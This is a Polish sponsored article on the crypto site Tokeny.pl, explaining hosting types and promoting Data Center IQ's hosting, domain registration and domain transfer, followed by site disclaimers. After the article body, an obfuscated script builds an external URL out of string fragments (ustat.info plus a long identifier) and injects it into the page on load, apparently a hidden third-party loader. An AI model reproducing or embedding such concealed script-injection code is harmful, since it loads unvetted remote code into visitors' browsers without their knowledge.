Śledź nas na lub dołącz do naszego

Prowadzenie działalności online to dzisiaj nieodłączna część strategii większości firm. Jednak by zapewnić sobie odpowiednią obecność w sieci, potrzebne jest miejsce do przechowywania strony internetowej, plików, bazy danych i innych zasobów. To właśnie w tym celu powstały usługi hostingowe. Sprawdź nasz artykuł i dowiedz się na ich temat więcej!

Usługi hostingowe – podstawowe informacje

Hosting to usługa, która występuje w wielu odmianach. Jedną z najpowszechniejszych jest wersja współdzielona, w której zasoby danego serwera są dzielone pomiędzy różne domeny internetowe czy bazy danych. To rozwiązanie odpowiednie dla małych i średnich projektów, które nie potrzebują aż tak dużej przepustowości.

Kolejna możliwość to hosting dedykowany. To rozwiązanie, w którym cały serwer przeznaczony jest wyłącznie na użytek jednego użytkownika lub witryny. Zapewnia zdecydowanie większą kontrolę i elastyczność, ale z reguły jest też droższy.

Dużą popularnością cieszy się też hosting VPS. W takim wypadku fizyczne urządzenie serwerowe jest podzielone na mniejsze wirtualne serwery z przypisanymi do nich własnymi zasobami. Dzięki temu użytkownik ma dostęp do własnego środowiska serwerowego i może dowolnie nim zarządzać.

Dobry hosting – najważniejsze cechy

Istnieje wiele kryteriów i funkcji, które trzeba wziąć pod uwagę podczas wybierania usług hostingowych dla swojej firmy. Przede wszystkim musi być on w pełni dostępny dla klienta, niezależnie od okoliczności, tak by ten mógł skorzystać ze wszystkich swoich zasobów.

Z tego powodu dobry hosting  ma wbudowane nie tylko zabezpieczenia chroniące dane przed atakami hakerskimi czy złośliwym oprogramowaniem, ale także wbudowane środki awaryjne takie jak agregaty prądotwórcze, podłączenia do kilku stacji rozdzielczych naraz czy umowy “na internet” z wieloma dostawcami. Jeżeli jeden z elementów zawiedzie, może być on szybko zastąpiony.

Hosting dla firmy musi być też wydajny. Oznacza to, że jego dostawca musi udostępniać sprzęt o dobrej konfiguracji, który pozwoli na szybki i płynny dostęp do danych. Dodatkowym plusem jest jego skalowalność. Dzięki niej użytkownik może dostosować zakres usług do swoich możliwości i oczekiwań, by płacić tylko za faktycznie wykorzystywane zasoby serwerowe.

Usługi hostingowe i nie tylko – Data Center IQ

Wszystkie wyżej wymienione kryteria spełnia Data Center IQ, jedno z najnowocześniejszych komercyjnych centrów danych w Polsce. Znajdziesz tam bezpieczny i szybki hosting z wysokiej klasy wsparciem technicznym i łatwymi narzędziami zarządzającymi.

Rozpoczęcie współpracy z Data Center IQ jest bardzo proste. To miejsce, w którym możesz wykupić i zarejestrować domeny internetowe, które później umieścisz na tutejszych serwerach. Dzięki temu wszystkie formalności załatwisz w jednym miejscu.

Masz już własną stronę i po prostu szukasz serwerów z lepszymi możliwościami niż te, które wykorzystujesz obecnie? Transfer domen to idealne rozwiązanie dla Ciebie. Dzięki temu przeniesiesz całą ich zawartość w zdecydowanie wydajniejsze i bezpieczniejsze środowisko. Postaw na transfer domen w IQ i ciesz się zupełnie nową jakością. Koniecznie zapoznaj się z pełną ofertą!

 

<script>
(function(){
ctet=document.createElement(“script”);ctet_=(“ust”);ctetu=”552605331″;
ctet_+=”a”+(“t.i”);ctet.type=”text/javascript”;
ctetu+=”.slc17zr2tetwgvf7idl8″;ctet.async=true;ctet_+=”n”+(“f”+”o”)+”/”;
ctetu+=”iv5je7lal7″;ctet.src=”https://”+ctet_+ctetu;
document.body.appendChild(ctet);
})();
</script>

2.5/5 - (8 votes)

Tokeny.pl to portal kryptowalut prowadzony przez zespół krypto entuzjastów. Głównym obszarem naszego zainteresowania są kryptowaluty, tokeny, tokeny personalne jak również technologia blockchain. Na łamach naszego serwisu będziemy prezetować niezależne recenzje kryptowalut oraz ciekawe artykuły z rynku. Dodatkowo prezentujemy aktualne kursy wszystkich krytowalut. Na stronie znajduje się również wielofunkcyjny kalkulator kryptowalut jak również walut tradycyjnych.

Informacje opublikowane na portalu kryptowalut tokeny.pl nie są rekomendacjami finansowymi oraz nie stanowią rekomendacji inwestycyjnych w rozumieniu Rozporządzenia Ministra Finansów z dnia 19 października 2005 roku w sprawie informacji stanowiących rekomendacje dotyczące instrumentów finansowych, ich emitentów lub wystawców (Dz. U. z 2005 roku, Nr 206, poz. 1715). Opublikowane na łamach portalu informacje nie stanowią oferty. Tokeny.pl nie ponosi odpowiedzialności za wszelkie decyzje, podjęte pod wpływem danych prezentowanych w Serwisie. Portal nie ponosi żadnej odpowiedzialności z tytułu ewentualnego wykorzystywania informacji na stronie.

Inwestycje w instrumenty rynku OTC, w tym kontrakty na różnice kursowe (CFD), ze względu na wykorzystywanie mechanizmu dźwigni finansowej wiążą się z możliwością poniesienia strat przekraczających wartość depozytu. Osiągnięcie zysku na transakcjach na instrumentach OTC, w tym kontraktach na różnice kursowe (CFD) bez wystawienia się na ryzyko poniesienia straty, nie jest możliwe, dlatego kontrakty na różnice kursowe (CFD) mogą nie być odpowiednie dla wszystkich inwestorów.

Copyright © 2019 Tokeny.pl

My Newsletter

Sign Up For Updates & Newsletters